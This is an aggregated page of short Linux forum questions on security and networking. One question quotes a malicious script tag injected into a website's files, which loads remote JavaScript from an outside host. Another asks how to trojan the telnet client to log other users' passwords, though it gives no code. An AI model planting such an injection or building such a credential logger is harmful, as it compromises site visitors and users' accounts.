Security :: How To Trojan A Telnet Client

Jun 20, 2010

I want to log the user name and password passed through the default telnet client on Fedora (7 to 11) system. I have thought of something like this: (Download Telnet client src)->(modify src)->(compile and install) but I am not sure...


Fedora Servers :: Windows PC Antivirus Picked Up A Trojan Horse Called "PHP/Rst.AK Trojan"

Feb 19, 2009

After compressing one of my sites and downloading it to my Windows PC, my antivirus picked up a trojan horse called "PHP/Rst.AK Trojan". I'm still very new to all this and was wondering how I go about removing malware etc. from my Fedora 8 server. Is there free virus scanning software I should be using?


Ubuntu Security :: Trojan Virus Wiped Off Printer Programs?

May 16, 2010

I used my printer without any problems using Ubuntu OS. As the day went on, surfing got slower. I lost the ability to print. Went into Windows OS, which I haven't used for a few days, and scanned with superantispyware. A Trojan virus was found. Went back to Ubuntu OS and found that all printer programs had been removed.


Ubuntu Security :: Trojan Virus Keeps Coming In Share Directory?

Sep 27, 2010

After some time I always see a trojan virus in my Ubuntu machine's shared folder. It is an exe detected by ClamAV as Trojan.Autokit-77. I thought I was getting it from some Windows machine on the network but that isn't the case. I deleted the virus and removed my computer from the network and still the virus comes back. My computer, however, is still connected to the internet through an independent mobile broadband USB stick.

So where is the virus coming from and why is it going to my shared folder? I thought Ubuntu would not allow the virus to do something like this without me giving it permission. I am running 10.4.


Ubuntu Security :: Run A Program That Is Infected With A Trojan / Virus In Wine Will Effect It

May 2, 2010

If I run a program that is infected with a trojan/virus in Wine, will it affect Ubuntu?


Security :: Transient Rkhunter Warning Of Sebek/adore Trojan On Desktop Debian?

Feb 22, 2011

Like Jackp27, I am reacting to a transient warning from rkhunter, indicating a possible LKM trojan, which may or may not be a false positive. Running chkrootkit and rkhunter repeatedly, including older versions running under live CDs like INSERT, indicated nothing wrong, but two runs of rkhunter running under the possibly compromised system itself did seem to suggest rkhunter thought it might have found elements of trojan code in RAM.

Like Jackp27, I can't give details right now because I do not currently have access to my logs, but I did find one webpage (can't give link because I do not currently have access to my detailed notes) suggesting that rkhunter may have thought it found a signature of the adore trojan in RAM by looking at /proc/kallsyms, which is not a file I ordinarily look at. I did look at it very closely yesterday, repeatedly, and it seems to be mostly empty, but occasionally seems to contain what might be a sequence of calls to various kernel modules--- right now I only recall that some had the form ??_guest_? and that x_tables might be involved.

Can anyone give me a rough indication of what /proc/kallsyms is supposed to do, whether it should normally be empty, and when it is not, what kind of lines are supposed to show up in that "file" when I cat it? I also saw something about ?_logdrop? which may have had something to do with rotating logs (I rebooted several times) rather than a trojan keylogger. But maybe some trojans rotate logs to try to hide their presence?

I know I am not giving enough information--- I hope to come back later with more details after I have managed to access my logs and notes, so feel free to say what kind of details would be most helpful in helping me decide whether or not this was a false positive.


General :: Compiling Telnet Client?

Apr 26, 2010

I have a telnet client src rpm. I need to make some changes in the src and recompile it. I am having problems recompiling the src rpm.


General :: Disable Telnet Command From Client End?

Jul 20, 2011

From the Linux client end I can easily telnet to a remote Linux server, like:

[root@apps1 ~]# telnet 192.168.1.14
Trying 192.168.1.14...
Connected to 192.168.1.14 (192.168.1.14).
Escape character is '^]'.
catalog.aibl.com (Linux release 2.6.18-8.el5 #1 SMP Tue Jun 5 23:25:19 EDT 2007) (1)
login:

But I want to disable the "telnet" command from the client end, so that I cannot telnet to a remote Linux server from the Linux client end.


Ubuntu Security :: Using Ubuntu To Remove Trojan From Windows 7

May 31, 2011

I stupidly clicked on a spam link on my roommate's computer (I must have forgotten that I wasn't using Ubuntu and had to be much more careful) and the computer is now infected by a nasty Trojan. (I unfortunately cannot remember the name right now, but it is a Trojan.) Now, her computer will barely start up under the normal Windows 7 without a blue screen of death appearing, with the IRQL_NOT_LESS_OR_EQUAL error message. I stumbled upon this: http://maketecheasier.com/remove-win...ux/2010/02/02/ and I thought I would give it a shot. I don't have a flash-drive, and I'm rather tight on cash at the moment, so instead of creating a USB stick with the OS they recommended, I used my live CD of Ubuntu 10.4. I installed Clam, and ran the update as it says, and it seemed to work alright. When I started the scan, however, (excluding .doc files), the first message that came up was that the software was out of date, but the scan proceeded, and so I figured all was alright. The scan took about an hour 45, and when it was done, it reported that 0 files were infected, and that there were 4 errors. I crossed my fingers and hoped that these errors were the problem and Clam fixed it, but alas, this was not the case. The computer is still just as screwed up.

Does anyone have any suggestions? Maybe the updates couldn't be saved because I was using a live CD instead of a USB? Hopefully this isn't the case, because I really don't want to have to go and buy a flashdrive, but I will if I must. Can a portion of an external harddrive be used as a boot drive?


Ubuntu Security :: Tor Open Port 23 For Telnet

Apr 24, 2010

Tor opens port 23 for telnet. Is this normal?


Security :: Restrict Telnet Session To Users ?

Oct 22, 2009

I want to restrict telnet sessions to users.

That means the client logs in one user at a time, not multiple logins.

For example:

I want to restrict this. How do I restrict one user from using multiple logins?


Ubuntu Security :: Router Logs Show Outgoing Telnet Connection

Apr 22, 2010

I have my router configured so that it drops outgoing telnet connections (and other protocols I don't use). It's a 2wire gateway. 192.168.1.65 is the internal IP of my Ubuntu box. I'm trying to figure out what normal network traffic looks like and whether I should be worried by this log entry. At the time this happened I was testing out TOR (just navigating to a few sites (dell, ubuntu forums, etc.) nothing all that interesting.)


Networking :: Difference Between Krb5-telnet And Ekrb5-telnet

Feb 18, 2010

I am trying to find the difference between the above two services. Both are under xinetd and can someone please explain the difference between them (is one more secure than the other one?)


Ubuntu :: Remove Trojan From A Website?

Jun 28, 2010

One of my friend's websites has the following code in almost 1500 files:

Code:
<script type="text/javascript" src="http://kollinsoy.skyefenton.com:8080/Data_Type.js"></script>
<!--db99f6effefc0ff79b57c785dc1a107c-->

How can I remove it? I tried clamscan but it did not find anything. I was wondering if I can use grep/sed to remove the above from the files.


Ubuntu :: View Source Code For Trojan

Jun 3, 2011

I just pulled the MS Removal Tool executable off a Windows 7 machine. Is there a way I can view the code on my Ubuntu machine? I am curious how they block the "real" av software from running. I did get rid of it, pretty simple.


General :: Win Trojan And Worm Removal From Live?

Jun 21, 2011

PartedMagic live Linux can load to memory and run clamav on a Windows drive to check for and remove viruses. However, I also need to find and remove trojans and worms on a Windows drive which clamav cannot find. Are there any worm and trojan removers for Linux, or do you need to install WINE and run the Windows trojan and worm removers?


Fedora Security :: Sandbox Does Not Run With NX Client?

Apr 12, 2011

My machine, running FC13, is accessed by a NX client / server (freenx-server.i686 package installed). Using the NoMachine NX client, when I launch the sandbox program (policycoreutils-sandbox.i686 package), for example,

sandbox -X xterm

the process dies without displaying a screen. The problem comes from the Xephyr server that complains: 'Xephyr cannot open host display. Is DISPLAY set ?'. Xephyr is called in the bash file /usr/share/sandbox/sandboxX.sh by:

/usr/bin/Xephyr -title "$TITLE" -terminate -screen $SCREENSIZE -displayfd 5 5>&1

Is there a way to solve this problem?


Security :: Ssh Encryption Key - How Client Know What Private Key To Use

Mar 18, 2011

When you install sshd and run it with no modifications, then any other machine can connect to your machine without specifying a key. How does this work? Some key is being used, correct? How does the client know what private key to use?


Security :: Web Client Authentication Through PKI And CACs?

Jul 9, 2010

I'm working on a work project related to Web (Client) authentication and DOD Common Access Cards. But I'm having difficulty getting the details about what happens on the CAC side of things.

I am familiar with the PKI system as it applies to e-mail. (Correct me if I err, of course.) If you want to sign an e-mail (i.e., so it can be authenticated by the receiver) you use your private key to add a digital signature to the message. Then, the receiver uses your published public key to determine if the digital signature is valid, i.e., was created using your private key (even though the receiver never actually has access to your private key).

So... my questions:

1) When a person with a DOD CAC visits a CAC-enabled web site, and the server grants access after the CAC is inserted, is the authentication process fundamentally the same as what happened with the e-mail authentication?

2) If the private key is used in this process (it would have to be, correct?) is the signature created on the CA Card electronics (i.e., the private key remains on the CAC)? Or is the private key copied onto the computer, which uses it to create the signature?


Ubuntu Security :: Unable To Ssh To Client When It Is Running Openvpn?

Apr 21, 2010

I have a virtual private server running ubuntu server edition that I have set up as an openvpn client. The problem I have is that the moment I turn on openvpn, I am no longer able to ssh into the machine. Is there a way to enable me to connect to it even when it is tunneling?


Ubuntu Security :: Get In To Email Client Thunderbird Or Firefox

Mar 18, 2011

I received a suspect email from PayPal which I reported to them. I didn't click on anything in the email. The question I am asking is: is there any way that someone could get in to my email client Thunderbird or Firefox? When I used Thunderbird to report the email I received a problem reporting that my email couldn't be sent due to AOL SMTP not accepting email because of SSL encryption. I checked the settings for the account; all seemed OK, SSL was still marked. Also while I was on the internet yesterday I got the popup regarding did I want to save a "file". I canceled as I didn't click anything to download anything.


Ubuntu Security :: Ssh Client Pass Phrase Window Has Gone

Apr 11, 2011

I'm using ssh key based authentication and I was pleased to find that when I set it up out of the box when I connected to my ssh server it prompted me with a password window rather than typing into the terminal and it remembered the pass phrase from one connection to the next.

For some reason it's stopped showing me the window, instead I'm logging in through the terminal, and it's stopped remembering my pass phrase between connections. Since I don't know what the program was called that gave me the login box, it's rather hard to search for.


Security :: Could Not Grab Mouse - Malicious Client Eavesdropping?

Oct 16, 2010

After visiting (and being booted from) pclinuxos.com's forum, I am getting the following error message on my system:

Could not grab your mouse. A malicious client may be eavesdropping on your session or you may have just clicked a menu or some application just decided to get focus. Try again.

I get this if I try to launch Unetbootin, Synaptic, Firewall... Did they put something into my puter? Or is some stuff simply broken after the latest update?


Security :: Allowing Dyndns Client - Update Iptables Frequently?

Sep 11, 2010

I am using dyndns to keep track of my smartphone's ip address. The idea is to be able to ssh into my home network, protected by an iptables firewall. If I use the command:

# iptables -I INPUT 9 -s myname.dyndns.org -p tcp -m tcp --dport 22 -j ACCEPT

it updates using the current ip address, but the next time I get an ip address update to my phone and update dyndns to properly provide nslookups, this is not being updated in iptables unless I restart my firewall. Is there a better way to do this?


Security :: Access Dom0 Files During Vsftpd Server From DomU During Ftp Client

Aug 24, 2010

I have a CentOS 5.5 distribution with Dom0 and DomU installed. I try to access Dom0 files during vsftpd server from DomU during ftp client. I successfully log in with root and a simple user, but when I try to list (or cd to some directory) in the user home, SELinux prevents me. I get this in audit.log:

[Code]....


Ubuntu Security :: Use A "secure" Proprietary Web-based Java FTP Client?

Oct 15, 2010

I was given the responsibility at work to upload some files to an offsite 3rd party FTP server. Apparently we use a "secure" proprietary web-based java FTP client.

The FTP client was buggy and repeatedly crashed. While I was waiting for it to work, I decided to look at the HTML of the website when I was logged in to their FTP server. It contained the following lines:

Code:
hostname="-------------"
username="--------"
password="--------"
connectionType="ftps"
mode="binary"
enableHost="false"
enableConnectionType="false"
enableAnonymous="false"

I substituted dashes for the sensitive information that was in the website. I do not have access to analyze the network traffic to see if our username and password is being transmitted in plain text to the website. It makes me nervous to see the username and password plainly written out in the html for a website; however analyzing the network traffic and securing networks is not part of my job description. So my question for people here who have this as part of their job description is as follows:


Ubuntu Security :: Users Connecting To Serverip:52000 And Should Land On Client:52000?

Jan 27, 2011

Perhaps someone can help me. Situation: A VPS Server, I installed a PPTP Server on it, is working. Client connecting to PPTP Server, working. Now I only want one port through the PPTP Connection, all others NOT. For example, Port 52000 on Client. Users connecting to Serverip:52000 should land on Client:52000, BUT, and that is what is important for me, with their real IP. If I do a POSTROUTING ppp0 MASQUERADE it is working, but the users in my log have the IP from the Server and not their real IP. It makes sense because I do masquerading.

Can anyone help me? That would be great! VPN IPs are 192.168.0.1 on Server and 192.168.0.234 on Client. I can ping each other. Server interfaces: eth0 and, if I am connected with the PPTP Client, ppp0 (192.168.0.1). I do not want to route all traffic through PPTP, only one or two ports!


Ubuntu Security :: Configure The Share And Folder So That The Win7 Client Can Create Files And/or Folders In The Share?

Jan 15, 2010

I've just installed Ubuntu 9.10 and Samba 3.4. I've shared a folder and have accessed the share from a Windows 7 client. However, I've struggled to configure the share and folder so that the Win7 client can create files and/or folders in the share. Kept getting Permission Denied errors. Finally, (using Webmin) I set the permissions on the file folder so that "Other" had write access. I don't understand why this was necessary (and how insecure this is). I already had the write access checkbox ticked for "User" but it wasn't enough.


Networking :: Connecting Debian Client To Voyager Client Via Crossover Cable?

Jan 6, 2011

I'm trying to create a "local network" by directly connecting an IBM Thinkpad with Debian Linux installed on it to an Alix computer running Voyager Linux. I'm following a "how to" I found to create a music server, hence the requirement. My issue is I can't get a static IP address to be configured on the Debian machine. I've trawled the net and have found the instructions about editing the /etc/network/interfaces and have tried to do this. First I tried to get DHCP working so I could connect the Debian machine to the net and this proved successful. I edited the interfaces file to look as follows:

# The loopback network interface
auto lo
iface lo inet loopback
auto eth0
iface eth0 inet dhcp

Then I tried adding a static IP address to the machine. As this is a network purely between two machines I made up the IP address and used 192.168.0.1 and used a NetMask calculator to give me a NetMask of 255.255.255.254 (I told the calculator there would be 2 machines on the network). I then edited the interfaces file as follows:

# The loopback network interface
auto lo
iface lo inet loopback

[code]....

I re-booted the machine (ifdown eth0 followed by ifup eth0 keeps saying that eth0 hasn't been configured - a problem there that I don't understand), but during boot up time it failed to assign the static IP address to eth0 and made me go into SU mode. To fix it I simply replaced the interface file with the static IP inputs with the file that had the DHCP entries (I'd made a copy of the DHCP file), and re-started the machine. Everything came up fine. So the first question is how do I get a static IP address to be assigned to eth0 such that whenever I shut down and restart the machine the static IP address is always loaded?

The second question is around creating the network via the cross over cable. From what I've found via Google, all I should have to do is create a static IP address on the Debian machine and a static IP address on the Voyager machine. Once they're connected by the cross over cable they should see each other. Is that correct, or do I have to do anything else?


Programming :: Detect A Closed Tcp Client Connection When Client Is Only Receiving Data ?

Mar 9, 2011

I am writing a TCP server in C, and the server listens to incoming client connections and accepts them. It then creates a thread to handle the client. The clients are expected to only receive data from my server and not send any data. So if I use a select() call with a recv(), I believe that the recv() will just block forever since there will not be any data coming from the client. If I use a non-blocking recv(), then this will just return a 0 which tells me nothing because the client is not expected to send any data. I am not sure if I have misunderstood some socket concepts, but I need a solution to detect when the client has disconnected so that I can close the socket and stop sending data to the client. As I understand it, simple ACKs etc are not captured by the recv(), and only data sent by the client will cause recv() to return a non-zero value, so I am not sure how to know when the client has disconnected.








Copyrights 2005-15 www.BigResource.com, All rights reserved